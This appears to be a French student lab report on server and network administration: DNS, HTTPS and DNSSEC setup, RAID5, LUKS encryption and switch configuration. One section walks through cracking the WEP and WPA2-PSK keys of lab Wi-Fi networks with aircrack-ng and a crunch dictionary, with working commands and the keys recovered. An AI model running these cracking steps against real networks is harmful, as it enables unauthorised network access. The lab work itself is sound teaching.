     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
